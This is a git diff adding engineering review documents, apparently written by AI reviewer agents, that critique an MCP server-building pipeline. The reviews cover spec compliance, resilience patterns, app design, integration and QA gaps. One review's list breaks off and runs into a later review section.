Tool returns `structuredContent` with typed data +3. Client (LocalBosses) receives typed data natively +4. Client routes data to the appropriate app + +Instead, we're asking the LLM to generate JSON inside HTML comments, which is: +- Error-prone (LLMs can produce invalid JSON) +- Not validated against any schema +- Not leveraging MCP's `outputSchema` validation +- Duplicating data (once in text for the user, once in the APP_DATA block) + +**MODERATE — System prompt engineering could leverage MCP Prompts:** +MCP has a first-class `prompts` capability. The system prompts for each channel could be registered as MCP Prompt resources, making them discoverable and versionable through the protocol rather than hardcoded in route.ts. + +**MODERATE — No mention of MCP Roots:** +MCP Roots let clients inform servers about workspace/project scope. For a multi-channel system like LocalBosses, roots could be used to scope which service's data is relevant in each channel. + +**MINOR — Intake questions could use MCP Elicitation:** +The app intake system (asking users questions before showing data) maps directly to MCP's elicitation capability. Instead of a custom intake system, the server could use `elicitation/create` to request initial parameters from the user. + +#### What's Good: +- Clear file-by-file integration guide +- Cross-reference verification checklist is essential +- Complete example (Calendly) is helpful +- System prompt engineering guidelines are practical + +--- + +### 5. MCP QA Tester (`mcp-qa-tester`) + +**Overall Grade: B+** — Thorough testing framework, but missing protocol-level validation. + +#### Issues: + +**CRITICAL — No MCP protocol compliance testing:** +The testing layers cover static analysis, visual testing, functional testing, and API testing — but never test MCP protocol compliance itself. Missing tests: +- Does the server respond correctly to `tools/list`? +- Does every tool return valid `structuredContent` matching its `outputSchema`? 
+- Does the server handle `initialize` → `initialized` lifecycle correctly? +- Are `notifications/tools/list_changed` sent when appropriate? +- Do error responses use correct JSON-RPC error codes? + +**Action:** Add "Layer 0: MCP Protocol Compliance" testing: +```bash +# Use MCP Inspector for protocol testing +npx @modelcontextprotocol/inspector stdio node dist/index.js +``` + +The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is the official tool for this — it should be the first thing we run. + +**MODERATE — No `structuredContent` validation:** +If tools declare `outputSchema`, the spec says "Servers MUST provide structured results that conform to this schema." QA should validate every tool's actual output against its declared schema. + +**MODERATE — Missing transport testing:** +QA only tests the app/UI layer. It should also test: +- stdio transport: Can the server be launched as a subprocess and respond to JSON-RPC? +- (If Streamable HTTP added): Can the server handle HTTP POST/GET, session management, SSE streams? + +**MINOR — No sampling/elicitation testing:** +If servers implement sampling or elicitation, these need test scenarios. + +**MINOR — Automated script is bash-only:** +The QA script could leverage the MCP Inspector CLI for automated protocol testing rather than just checking file existence. + +#### What's Good: +- 5-layer testing model is comprehensive +- Visual testing with Peekaboo/Gemini is creative +- Thread lifecycle testing is thorough +- Common issues & fixes table is practical +- Test report template is well-structured + +--- + +## Research Findings: What's New/Changed + +### MCP Spec Versions (timeline): +| Version | Date | Key Features | +|---------|------|-------------| +| 2024-11-05 | Nov 2024 | Initial spec (tools, resources, prompts, sampling) | +| 2025-03-26 | Mar 2025 | Streamable HTTP transport, annotations (readOnlyHint etc.) 
| +| **2025-06-18** | **Jun 2025** | **structuredContent, outputSchema, Elicitation, OAuth 2.0, resource_link** | +| **2025-11-25** | **Nov 2025** | **Tasks (async), icons, title field, URL elicitation, tool naming guidance, incremental OAuth scope** | + +### TypeScript SDK Status (Feb 2026): +- **v1.26.0** (released Feb 4, 2026) — current stable, implements 2025-11-25 spec +- **v2 pre-alpha** (targeting Q1 2026 stable) — BREAKING: splits into `@modelcontextprotocol/server` + `@modelcontextprotocol/client`, uses Zod v4, adds middleware packages (Express, Hono, Node HTTP) +- v1.x will receive bug fixes for 6+ months after v2 ships + +### Features We're Completely Ignoring: + +1. **`structuredContent` + `outputSchema`** (2025-06-18) + - Tools can declare typed output schemas + - Results include both `content` (text fallback) and `structuredContent` (typed JSON) + - Clients validate structured output against the schema + - **Impact: HIGH** — This is the proper way to send typed data to our apps + +2. **Elicitation** (2025-06-18, enhanced 2025-11-25) + - Form mode: Server requests structured user input via JSON Schema forms + - URL mode: Server directs user to external URL for sensitive operations (OAuth, payments) + - **Impact: HIGH** — Replaces our custom intake system, enables mid-tool user interaction + +3. **Tasks** (2025-11-25, experimental) + - Long-running tool calls become tasks that can be polled/resumed + - Enables "call now, fetch later" pattern + - **Impact: MODERATE** — Useful for slow API calls, batch operations + +4. **Tool `title` + `icons`** (2025-11-25) + - Human-readable display name separate from machine name + - Icon arrays for UI rendering + - **Impact: LOW** — Nice for rich clients + +5. **Content annotations** (`audience`, `priority`) + - Content blocks can specify intended audience (user vs assistant) + - Priority hints for UI rendering order + - **Impact: LOW** — Useful for controlling what the user sees vs what feeds back to LLM + +6. 
**Streamable HTTP transport** (2025-03-26) + - HTTP POST/GET with optional SSE streaming + - Session management via `MCP-Session-Id` header + - Resumability via `Last-Event-ID` + - **Impact: MODERATE** — Needed for remote/production deployment, not just local stdio + +7. **MCP Resources as tool output** (`resource_link`) + - Tools can return links to subscribable resources + - **Impact: LOW** for now, but enables real-time data patterns + +8. **MCP Registry** (GA targeting soon) + - Central index of MCP servers + - Server identity via `.well-known` URLs + - **Impact: LOW** for our internal use, but relevant if publishing servers + +--- + +## Priority Recommendations (Ranked by Impact) + +### P0 — Must Fix (blocks Feb 2026 compliance) + +**1. Add `structuredContent` + `outputSchema` to server builder** +- Every tool should declare an `outputSchema` +- Every tool result should include both `content` and `structuredContent` +- This is THE most impactful change — it's the standard way to return typed data +- Directly benefits the app system (structured data replaces text parsing) + +**2. Add `title` field to all tool definitions** +- Simple change, required by modern clients (VS Code, Claude Desktop) +- `title: "List Contacts"` alongside `name: "list_contacts"` + +**3. Pin SDK version to `^1.25.0` minimum** +- Ensures 2025-11-25 spec support +- Update Zod peer dep to `^3.25.0` + +### P1 — Should Fix (significant quality improvement) + +**4. Add Streamable HTTP transport option to server builder** +- Provide both stdio and HTTP transport patterns +- README should document remote deployment +- Doesn't need to replace stdio, just offer it as an option + +**5. Add Elicitation to the server builder template** +- Document how tools can request user input via `elicitation/create` +- Map to our existing intake system +- Especially useful for destructive operations ("Are you sure?") + +**6. 
Add MCP protocol compliance testing to QA skill** +- Integrate MCP Inspector as Layer 0 +- Test `tools/list`, `tools/call`, lifecycle, error codes +- Validate `structuredContent` against `outputSchema` + +**7. Clarify LocalBosses app pattern vs MCP protocol** +- APP_DATA is LocalBosses-specific, not MCP +- Document the bridge: MCP `structuredContent` → LocalBosses app rendering +- Long-term: replace APP_DATA HTML comments with proper tool result routing + +### P2 — Nice to Have (forward-looking) + +**8. Add Tasks (async) support for slow API operations** +- Experimental in 2025-11-25, but useful for batch operations +- Mark as experimental in the template + +**9. Add content annotations (`audience`, `priority`) to tool results** +- Route user-facing content to apps, assistant-facing content to LLM context +- Low effort, moderate polish improvement + +**10. Plan for SDK v2 migration** +- v2 targets Q1 2026 stable release +- Package split: `@modelcontextprotocol/server` + `@modelcontextprotocol/client` +- Zod v4 is the default +- Middleware packages for Express/Hono/Node HTTP +- Add a migration note to the builder skill + +**11. Add `outputSchema` planning to the API analyzer** +- For each tool, capture the expected response schema +- This feeds directly into the builder's `outputSchema` declarations + +**12. Add Elicitation candidates to the API analyzer** +- Identify flows that benefit from mid-tool user interaction +- Auth confirmation, destructive operation confirmation, multi-step wizards + +--- + +## Appendix: Quick Reference — What the Spec Says Now + +### Tool Definition (2025-11-25): +```json +{ + "name": "list_contacts", + "title": "Contact List", + "description": "List contacts with filters...", + "icons": [{ "src": "...", "mimeType": "image/png" }], + "inputSchema": { "type": "object", ... }, + "outputSchema": { "type": "object", ... 
}, + "annotations": { + "readOnlyHint": true, + "destructiveHint": false, + "idempotentHint": true, + "openWorldHint": false + } +} +``` + +### Tool Result with structuredContent (2025-06-18+): +```json +{ + "content": [ + { "type": "text", "text": "{\"data\":[...]}" } + ], + "structuredContent": { + "data": [{ "name": "John", "email": "john@example.com" }], + "meta": { "total": 150, "page": 1 } + }, + "isError": false +} +``` + +### Error Handling (2025-11-25): +- **Protocol Errors**: JSON-RPC error codes (-32600 to -32603, -32700) + - Unknown tool, malformed request, server errors +- **Tool Execution Errors**: `isError: true` in result + - API failures, validation errors, business logic errors + - **Input validation errors SHOULD be Tool Execution Errors** (enables LLM self-correction) + +### Transports: +1. **stdio** — local subprocess, recommended for desktop clients +2. **Streamable HTTP** — HTTP POST/GET with optional SSE, recommended for production +3. SSE (legacy) — deprecated, use Streamable HTTP instead + +--- + +*Review complete. The pipeline is solid as a production framework — but it was designed around the 2025-03-26 spec and needs updating for the 2025-06-18 and 2025-11-25 spec releases. The three biggest gaps are structuredContent/outputSchema, the title field, and transport diversity. 
Fix those and this pipeline is genuinely state-of-the-art.* diff --git a/mcp-factory-reviews/beta-production-review.md b/mcp-factory-reviews/beta-production-review.md new file mode 100644 index 0000000..fe64334 --- /dev/null +++ b/mcp-factory-reviews/beta-production-review.md @@ -0,0 +1,547 @@ +# Agent Beta — Production Engineering & DX Review + +**Date:** 2026-02-04 +**Reviewer:** Agent Beta (Production Engineering & Developer Experience Expert) +**Scope:** MCP Factory pipeline — master blueprint + 5 skills +**Model:** Opus + +--- + +## Executive Summary + +- **The pipeline is well-structured for greenfield development but has no provisions for failure recovery, resumability, or rollback** — if an agent crashes mid-Phase 3 with 12 of 20 apps built, there's no checkpoint to resume from; the entire phase starts over. +- **The "30 untested servers" inventory is a ticking bomb at scale** — the skills assume each server is a fresh build, but the real near-term problem is validating/remediating 30 existing servers against live APIs; the pipeline has no "audit/remediation" mode. +- **Token budget and context window pressure are unaddressed** — research shows 50+ tools can consume 10,000-20,000 tokens just in tool definitions; with GHL at 65 apps and potentially 100+ tools, this is a live performance issue the skills don't acknowledge. +- **No gateway pattern, no centralized secret management, no health monitoring** — production MCP at scale (2026 state of the art) demands an MCP gateway for routing, centralized auth, and observability; the pipeline builds 30+ independent servers with independent auth, which the industry calls "connection chaos." +- **The skills are excellent reference documentation but lack operational runbooks** — they tell you *how to build* but not *how to operate*, *how to debug when broken at 3am*, or *how to upgrade when APIs change*. 
+ +--- + +## Per-Skill Reviews + +### Skill 1: `mcp-api-analyzer` (Phase 1) + +**Strengths:** +- Excellent prioritized reading order (auth → rate limits → overview → endpoints → pagination). This is genuinely good engineering triage. +- The "Speed technique for large APIs" section acknowledging OpenAPI spec parsing is smart — most analysis time is wasted reading docs linearly. +- Tool description formula (`What it does. What it returns. When to use it.`) is simple, memorable, and effective. +- App candidate selection criteria (build vs skip) prevents app sprawl. + +**Issues:** + +1. **No handling of non-REST API patterns** (CRITICAL) + - The entire skill assumes REST APIs with standard HTTP verbs and JSON responses. + - **Missing:** GraphQL APIs (single endpoint, schema introspection, query/mutation split) + - **Missing:** SOAP/XML APIs (still common in enterprise: ServiceTitan, FieldEdge, some Clover endpoints) + - **Missing:** WebSocket/real-time APIs (relevant for chat, notifications, live dashboards) + - **Missing:** gRPC APIs (growing in B2B SaaS) + - **Fix:** Add an "API Style Detection" section upfront. If non-REST, document the adaptation pattern. For GraphQL: map queries→read tools, mutations→write tools, subscriptions→skip (or note for future). For SOAP: identify WSDL, map operations to tools. + +2. **Pagination analysis is too shallow** (HIGH) + - Lists cursor/offset/page as the only patterns, but real APIs have: + - **Link header pagination** (GitHub-style — `Link: <url>; rel="next"`) + - **Keyset pagination** (Stripe-style — `starting_after=obj_xxx`) + - **Scroll/search-after** (Elasticsearch-style) + - **Composite cursors** (base64-encoded JSON with multiple sort fields) + - **Token-based** (AWS-style `NextToken`) + - **Fix:** Expand pagination section with a pattern catalog. Each entry should note: how to request next page, how to detect last page, whether total count is available, and whether backwards pagination is supported. + +3.
**Auth flow documentation assumes happy path** (MEDIUM) + - OAuth2 has 4+ grant types (authorization code, client credentials, PKCE, device code). The template just says "OAuth2" without specifying which. + - **Missing:** Token storage strategy for MCP servers (they're long-running processes — how do you handle token refresh for OAuth when the server may run for days?). + - **Missing:** API key rotation procedures. What happens when a key is compromised? + - **Fix:** Add auth pattern subtypes. For OAuth2 specifically, document: grant type, redirect URI requirements, scope requirements, token lifetime, refresh token availability. + +4. **No version/deprecation awareness** (MEDIUM) + - Says "skip changelog/migration guides" which is dangerous. Many APIs (GHL, Stripe, Twilio) actively deprecate endpoints and enforce version sunsets. + - **Fix:** Add a "Version & Deprecation" section to the analysis template: current stable version, deprecation timeline, breaking changes in recent versions, version header requirements. + +5. **Rate limit analysis doesn't consider burst patterns** (LOW-MEDIUM) + - Many APIs use token bucket or leaky bucket algorithms, not simple "X per minute" limits. + - The analysis should capture: sustained rate, burst allowance, rate limit scope (per-key, per-endpoint, per-user), and penalty for exceeding (429 response vs temporary ban). + +**DX Assessment:** A new agent could follow this skill clearly. The template is well-structured. The execution workflow at the bottom is a nice checklist. Main gap: the skill reads as "analyze a typical REST API" when reality is much messier. + +--- + +### Skill 2: `mcp-server-builder` (Phase 2) + +**Strengths:** +- The one-file vs modular decision tree (≤15 tools = one file) is pragmatic and prevents over-engineering. +- Auth pattern catalog (A through D) covers the most common cases. +- The annotation decision matrix is crystal clear. 
+- Zod validation as mandatory before any API call is the right call — catches bad input before burning rate limit quota. +- Error handling standards (client → handler → server) with explicit "never crash" rule. + +**Issues:** + +1. **Lazy loading provides minimal actual benefit for stdio transport** (CRITICAL MISCONCEPTION) + - The skill emphasizes lazy loading as a key performance feature, but research shows the real issue is different: + - **For stdio MCP servers**: The server process starts fresh per-session. `ListTools` is called immediately on connection, which triggers `loadAllGroups()` anyway. Lazy loading only helps if a tool is *never* used in a session — but the tool *definitions* are still loaded and sent. + - **The actual bottleneck is token consumption**, not server memory. Research from CatchMetrics shows 50+ tools with 200-token average definitions = 10,000+ tokens consumed from the AI's context window before any work begins. + - **What actually matters:** Concise tool descriptions and minimal schema verbosity. The skill optimizes the wrong thing. + - **Fix:** Add a "Token Budget Awareness" section. Set a target: total tool definition tokens should stay under 5,000 for a server. For large servers (GHL with 65 apps), implement tool groups that are *selectively registered* based on channel context, not just lazily loaded. + +2. **No circuit breaker pattern** (HIGH) + - The retry logic in `client.ts` does exponential backoff on 5xx errors, but: + - No circuit breaker to stop hammering a down service + - No fallback responses for degraded mode + - No per-endpoint failure tracking + - **Real-world scenario:** ServiceTitan's API goes down at 2am. Your server retries every request 3 times with backoff, but a user sending 10 messages triggers 30 failed requests in rapid succession. Without a circuit breaker, you're amplifying the failure. 
+ - **Fix:** Add a simple circuit breaker to the API client: + ``` + - Track failure count per endpoint (or globally) + - After N consecutive failures, enter "open" state + - In "open" state, immediately return cached/error response without hitting API + - After timeout, try one request ("half-open") + - If succeeds, close circuit; if fails, stay open + ``` + +3. **Pagination helper assumes uniform patterns** (HIGH) + - The `paginate()` method in client.ts assumes query param pagination (`?page=1&pageSize=25`), but: + - Stripe uses `starting_after` with object IDs + - GHL uses different pagination per endpoint + - Some APIs use POST body for pagination (Elasticsearch) + - Some return a `next_url` you fetch directly + - **Fix:** Make pagination a pluggable strategy. Create a `PaginationStrategy` interface with implementations for: offset, cursor, keyset, link-header, and next-url patterns. Each tool can specify which strategy its endpoint uses. + +4. **No request/response logging** (HIGH) + - The server has zero observability. No structured logging. No request IDs. No timing. + - When something breaks in production, the only signal is `console.error` on stderr. + - **Fix:** Add a minimal structured logger: + ```typescript + function log(level: string, event: string, data: Record<string, unknown>) { + console.error(JSON.stringify({ ts: new Date().toISOString(), level, event, ...data })); + } + ``` + Log: tool invocations (name, duration, success/fail), API requests (endpoint, status, duration), errors (with stack traces). + +5. **TypeScript template has placeholder variables** (MEDIUM-DX) + - `process.env.{SERVICE}_API_KEY` — the curly braces are literal template markers that won't compile. + - The builder agent needs to know to replace these. This is documented implicitly but could trip up an automated build.
+ - **Fix:** Either use actual environment variable names in examples, or add an explicit "Template Variables" section listing all `{service}`, `{SERVICE}`, `{Service}` patterns that must be replaced. + +6. **No health check or self-test capability** (MEDIUM) + - No way to verify the server is working without sending a real tool call. + - **Fix:** Add a `ping` or `health_check` tool that validates: env vars are set, API base URL is reachable, auth token is valid. This is invaluable for QA (Phase 5) and ongoing monitoring. + +7. **Missing: Connection timeout configuration** (MEDIUM) + - The `fetch()` calls have no timeout. A hanging API response will block the tool indefinitely. + - **Fix:** Add `AbortController` with configurable timeout (default 30s) to every request. + +**DX Assessment:** Strong skill. An agent given an analysis doc can produce a working server. The templates are copy-paste ready (after variable substitution). Biggest risk: servers work in demo but fail under real-world conditions because resilience patterns are absent. + +--- + +### Skill 3: `mcp-app-designer` (Phase 3) + +**Strengths:** +- The design system is comprehensive and consistent. Color tokens, typography scale, spacing — this is production-quality design documentation. +- 8 app type templates cover the vast majority of use cases. +- Three required states (loading, empty, data) with the skeleton animation is excellent UX. +- Utility functions (`escapeHtml`, `formatCurrency`, `getBadgeClass`) prevent common bugs. +- `escapeHtml()` prevents XSS — security-aware by default. + +**Issues:** + +1. **Polling creates unnecessary load at scale** (HIGH) + - Every app polls `/api/app-data` every 3 seconds. With 10 apps open across tabs/threads, that's 200 requests/minute to the LocalBosses API. + - The comment says "stop polling once we have data" but only if postMessage succeeds first. If the initial postMessage fails (race condition), polling continues indefinitely. 
+ - **Fix:** + - Increase poll interval to 5s, then 10s, then 30s (exponential backoff on polling) + - Add a maximum poll count (stop after 20 attempts, show error state) + - Consider replacing polling with a one-time fetch + event listener pattern + - Add `document.hidden` check — don't poll if tab isn't visible (`visibilitychange` event) + +2. **No data validation in render functions** (HIGH) + - The render functions do basic null checks but don't validate data shapes. If the AI returns `data.contacts` but the app expects `data.data`, you get a blank screen with no error. + - Every app type template accesses data differently: `data.data || data.items || data.contacts || data.results` — this "try everything" pattern masks bugs and makes debugging hard. + - **Fix:** Add a `validateData(data, expectedShape)` helper that checks for required fields and logs warnings for missing ones. Have each app type declare its expected data shape explicitly. + +3. **Accessibility is completely absent** (MEDIUM) + - No ARIA attributes, no keyboard navigation, no focus management. + - Tables have no `scope` attributes on headers. + - Status badges rely solely on color (fails WCAG for color-blind users). + - **Fix:** At minimum: add `role` attributes to dynamic regions, `aria-label` on interactive elements, and text alternatives for color-coded status badges (e.g., add a text prefix: "● Active" vs just the green badge). + +4. **CSS-only charts don't handle negative values or zero-height bars** (LOW-MEDIUM) + - The analytics bar chart template: `height:${Math.max(pct, 2)}%` — minimum 2% height is good, but: + - No support for negative values (common in financial data: losses, negative growth) + - No axis labels or gridlines + - Bar chart is the only visualization option + - **Fix:** For the factory's scope this is acceptable, but add a note that complex visualizations should use a lightweight inline charting approach or consider SVG-based charts (still no external deps). + +5. 
**File size guideline ("under 50KB") may be exceeded for complex apps** (LOW) + - The pipeline/kanban template with 20+ items in 6 stages, plus all the CSS and utility functions, can exceed 50KB. + - **Fix:** The guideline is fine, but add a note about minification. Even simple whitespace removal can cut 30% off HTML file sizes. Could add a build step: `html-minifier` in the server build process. + +**DX Assessment:** The strongest skill in terms of "copy template, customize, ship." The design system is well-documented enough that even a junior developer could build consistent apps. The templates handle 90% of cases well. The 10% edge cases (complex data, accessibility, performance) are where issues arise. + +--- + +### Skill 4: `mcp-localbosses-integrator` (Phase 4) + +**Strengths:** +- The cross-reference check ("every app ID must appear in ALL 4 files") is critical and well-called-out. +- The complete Calendly example at the end is extremely helpful — shows all 5 files in one cohesive example. +- System prompt engineering guidelines differentiate natural language capability descriptions from raw tool names. +- The `systemPromptAddon` pattern with sample data shapes is clever — gives the AI a template to follow. + +**Issues:** + +1. **No automated cross-reference validation** (CRITICAL) + - The skill says "verify all app IDs appear in all 4 files" but provides no automated way to do this. + - With 30+ servers × 5-15 apps each = 150-450 app IDs to track. Manual verification is guaranteed to miss something. 
+ - **Fix:** Create a validation script (should live in `scripts/validate-integration.ts`): + ``` + - Parse channels.ts → extract all mcpApps arrays + - Parse appNames.ts → extract all keys + - Parse app-intakes.ts → extract all keys + - Parse mcp-apps/route.ts → extract APP_NAME_MAP keys + - Cross-reference: every ID in channels must exist in other 3 files + - Verify: every APP_NAME_MAP entry resolves to an actual HTML file + - Output: missing entries, orphaned entries, file resolution failures + ``` + - This script should run in CI and as part of Phase 5 QA. + +2. **System prompt scaling problem** (HIGH) + - Each channel gets one system prompt that lists all capabilities. For GHL (65 apps, 100+ tools), this prompt is enormous. + - The `systemPromptAddon` in app-intakes adds *per-thread* instructions with sample data shapes. For a channel with 15 apps, the AI's context is loaded with instructions for all 15 app types even though only 1 is active. + - **Fix:** + - System prompts should be modular: core identity + dynamically injected tool-group descriptions based on the current thread's app. + - `systemPromptAddon` should be the ONLY app-specific instruction injected, not in addition to the full channel prompt. + - Consider a "prompt budget" target: channel system prompt < 500 tokens, addon < 300 tokens. + +3. **APP_DATA format is fragile** (HIGH) + - The `<!--APP_DATA:{...}:END_APP_DATA-->` format relies on the AI producing exact delimiters. + - Real-world failure modes: + - AI adds a line break inside the JSON (spec says "single line" but LLMs don't reliably follow this) + - AI adds text after END_APP_DATA + - AI wraps it in a code block (````json\n<!--APP_DATA:{...}:END_APP_DATA-->`). This is the weakest link. Even with the parser fallbacks, LLMs regularly produce: multi-line JSON (breaking the "single line" rule), truncated JSON (context window limits), hallucinated data (when they don't have real tool results), and inconsistent field names (calling it `total_contacts` vs `totalContacts` vs `contacts_count`).
+- **No schema enforcement between tool output and APP_DATA.** The tool returns `structuredContent` with a known schema. The LLM then re-serializes this as APP_DATA. But there's no validation that the LLM's APP_DATA matches what the app's `render()` function expects. The tool might return `{data: [...]}` but the LLM outputs `{contacts: [...]}`, and the app looks for `data.data` and shows the empty state. +- **System prompts are duplicating tool information.** The channel system prompt describes tools in natural language, and the MCP tool definitions ALSO describe tools. This is double context consumption. When tools change, the system prompt becomes stale. +- **The `systemPromptAddon` examples include sample JSON structures.** This consumes significant tokens showing the LLM what to output, but it's fragile — if the app's render function changes, the addon becomes a lie. +- **Thread State Management relies entirely on localStorage.** No server-side persistence means all thread history is lost on cache clear, device switch, or incognito mode. + +**Testing theater vs real quality:** +- The Integration Validation Script is excellent for static cross-referencing. But it doesn't test the *runtime* behavior — does clicking the app actually open a thread? Does the AI actually generate valid APP_DATA? Those are left entirely to manual Phase 5 QA. + +--- + +### 6. mcp-qa-tester/SKILL.md + +**What's great:** +- The 6-layer testing architecture (Protocol → Static → Visual → Accessibility → Functional → Performance → Live API → Security → Integration) is genuinely comprehensive. +- Quantitative Quality Metrics with specific targets (Tool Correctness >95%, Task Completion >90%, Accessibility >90%, Cold Start <2s, Latency P50 <3s) — finally, numbers instead of checkboxes. +- MCP Protocol Compliance testing via MCP Inspector + custom JSON-RPC lifecycle tests validates the foundation correctly. 
+- Automated Playwright visual tests that check loading/empty/data states, dark theme compliance, and responsive layout are well-designed. +- axe-core accessibility integration with score calculation and keyboard navigation testing is real accessibility testing, not theater. +- The BackstopJS visual regression approach with 5% pixel diff threshold is solid. +- Security testing with 10 XSS payloads, postMessage origin validation, CSP checks, and API key exposure scans covers the critical vectors. +- Chaos testing (API 500s, wrong postMessage format, 500KB datasets, rapid-fire messages, concurrent apps) tests real failure modes. +- Test data fixtures library with edge cases (unicode, extremely long text, null values, XSS payloads) is thorough. +- Persistent QA reports with trend tracking across runs enables regression detection. + +**What would produce mediocre experiences:** +- **Tool Correctness testing is theoretical.** The skill defines routing fixtures (20+ NL messages → expected tool) but doesn't actually send them through the LLM. It validates that fixture files exist and that tool names are real. The actual routing accuracy test requires "the AI/LLM in the loop" — acknowledged as a comment but not automated. +- **No end-to-end data flow testing.** There's no test that: (1) sends a message to the AI, (2) verifies the AI calls the right tool, (3) captures the AI's response, (4) extracts APP_DATA, (5) validates APP_DATA schema, (6) sends it to the app iframe, (7) screenshots the result. This end-to-end flow is the magic moment, and it's tested manually. +- **MSW mocks test the handler code, not the real API.** Layer 3 tests use Mock Service Worker — essential for unit testing, but the mocks are hand-crafted. There's no guarantee the mocks match the real API's response shape. If the real API returns `{results: [...]}` but the mock returns `{data: [...]}`, the tests pass but production fails. 
+- **No APP_DATA generation testing with actual LLMs.** The QA skill validates APP_DATA *parsing* (can we extract JSON from the text?) but not APP_DATA *generation* (does the LLM actually produce correct JSON given the system prompt?). This is the highest-failure-rate step. +- **Visual testing requires manual baseline capture.** `backstop reference` must be run when apps are "verified correct" — but who verifies? And baselines aren't stored in version control by default. +- **No monitoring or production quality metrics.** All testing is pre-ship. There's no guidance on tracking tool correctness, APP_DATA parse success rate, or user satisfaction in production. + +**Testing theater vs real quality:** +- The QA skill is about 70% real testing (static analysis, visual regression, accessibility, security, chaos) and 30% theater (tool routing fixtures that aren't run through LLMs, E2E scenarios that are manual templates, live API testing that's skipped for 30/37 servers due to missing credentials). +- The biggest gap: **the most important quality question — "does the user get the right data in a beautiful app within 3 seconds?" — is never tested automatically.** + +--- + +## Pass 2 Notes (user journey trace, quality gaps, testing theater) + +### The Full User Journey (traced end-to-end) + +``` +USER types: "show me my top customers" + │ + ▼ [QUALITY DROP POINT 1: Tool Selection] +AI reads system prompt + tool definitions +AI must select correct tool (list_contacts? search_contacts? get_analytics?) + │ + ▼ [QUALITY DROP POINT 2: Parameter Selection] +AI must figure out what "top" means (by revenue? by recency? by deal count?) +If ambiguous, should it ask or guess? 
+ │ + ▼ [QUALITY DROP POINT 3: API Execution] +MCP tool calls real API → gets data or error +Error handling must be graceful (circuit breaker, retry, timeout) + │ + ▼ [QUALITY DROP POINT 4: LLM Re-serialization ← BIGGEST GAP] +AI receives structuredContent from tool +AI must re-serialize it as APP_DATA JSON in its text response +This is where JSON gets mangled, fields get renamed, data gets truncated + │ + ▼ [QUALITY DROP POINT 5: APP_DATA Parsing] +Frontend must parse the APP_DATA block from response text +The parser has fallbacks, but failure = app shows empty state + │ + ▼ [QUALITY DROP POINT 6: Data Shape Mismatch] +App's render() expects data.data[] but receives data.contacts[] +App shows empty state or crashes — user sees nothing + │ + ▼ [QUALITY DROP POINT 7: Render Quality] +App renders with correct data +But: is it the RIGHT data? Did the AI interpret "top customers" correctly? + │ + ▼ USER sees result (total time: 3-10 seconds) +``` + +**The critical insight:** Quality Drop Point 4 (LLM Re-serialization) is the highest-failure-rate step, yet it has the LEAST testing coverage. The analyzer writes tool descriptions (helps point 1), the builder validates API calls (helps point 3), the QA tester checks visual rendering (helps point 7), but NOBODY systematically tests points 4-6. + +### Mental Testing: Ambiguous Queries + +I mentally tested the tool descriptions with ambiguous queries: + +| User Says | Ambiguity | Current System Response | Better Response | +|---|---|---|---| +| "show me John" | Which John? Which tool? | Probably `search_contacts` — but if multiple Johns, shows grid instead of card | Should ask "Which John?" via elicitation, or show grid with filter | +| "delete everything" | Delete what? | Hopefully doesn't call `delete_*` — system prompt says "confirm first" | Should refuse without specifics — destructive + vague = must clarify | +| "what happened today" | Activity? Calendar? Dashboard? 
| Could route to timeline, calendar, or dashboard depending on channel | Should default to timeline/activity feed — "what happened" implies events | +| "update the deal" | Which deal? What fields? | `update_deal` needs an ID — will fail with validation error | Should search deals first, then ask which one | +| "show me revenue and also add a new contact named Sarah" | Multi-intent | Will likely only handle one intent (probably the first) | Should acknowledge both, handle sequentially, or ask which to do first | +| "actually, I meant the other one" | Contextual correction | System has no memory of previous results — can't resolve "the other one" | Need conversation state tracking — remember previous result sets | + +**Key finding:** Multi-intent messages and contextual corrections are completely unaddressed. The system prompt has no guidance for handling "actually I meant..." or "also do X." + +### System Prompt Sufficiency for APP_DATA + +I evaluated whether the `systemPromptAddon` templates actually produce correct APP_DATA consistently: + +**The Good:** +- Few-shot examples (when included) dramatically improve consistency +- The explicit field listing ("Required fields: title, metrics, recent") helps + +**The Bad:** +- The system prompt says "SINGLE LINE JSON" but LLMs consistently produce multi-line JSON, especially for large datasets. The parser handles this, but it shouldn't have to. +- No schema validation between what the addon describes and what the app's render() expects. These can drift silently. +- The addon tells the LLM to "generate REALISTIC data" — but when using real tool results, it should use THAT data, not fabricate realistic-looking data. This instruction is confusing. + +### Are the Apps Actually Delightful? 
+ +**What feels good:** +- The dark theme is polished and consistent — it feels like a real product, not a prototype +- Loading skeletons with shimmer animation look professional +- Status badges with semantic colors (green=active, red=failed) communicate at a glance +- The Interactive Data Grid with sort/filter/expand is genuinely useful + +**What feels mediocre:** +- **Static data.** Once rendered, the app is a snapshot. No live updates, no streaming data. You see "245 contacts" but it doesn't change until you ask another question. +- **No visual feedback during AI processing.** User types a follow-up question → sees the old app → waits → suddenly the app flashes with new data. No "updating..." indicator. +- **No drill-down.** You see a data grid with contacts but clicking a contact name doesn't open the detail card. The `sendToHost('navigate')` pattern exists in code but isn't wired up. +- **No data persistence across sessions.** Close the browser, lose all thread state and app data. +- **Charts are basic.** The SVG primitives are functional but look like early d3.js examples, not like a modern analytics dashboard. No tooltips on hover, no click-to-filter, no zoom. + +--- + +## Research Findings (latest techniques for tool optimization and agent evaluation) + +### 1. Berkeley Function Calling Leaderboard (BFCL V4) — Key Findings + +The BFCL evaluates LLMs' ability to call functions accurately across real-world scenarios. Key insights: +- **Negative instructions reduce misrouting by ~30%.** The MCP Factory already includes "Do NOT use when..." in tool descriptions — this is validated by BFCL research. +- **Tool count vs accuracy tradeoff:** Accuracy degrades significantly above 15-20 active tools per interaction. The Factory's lazy loading approach (loading groups on demand) is the right mitigation, but the `ListTools` handler returns ALL tools regardless. Clients see the full inventory. +- **Multi-step tool chains** are where most agents fail. 
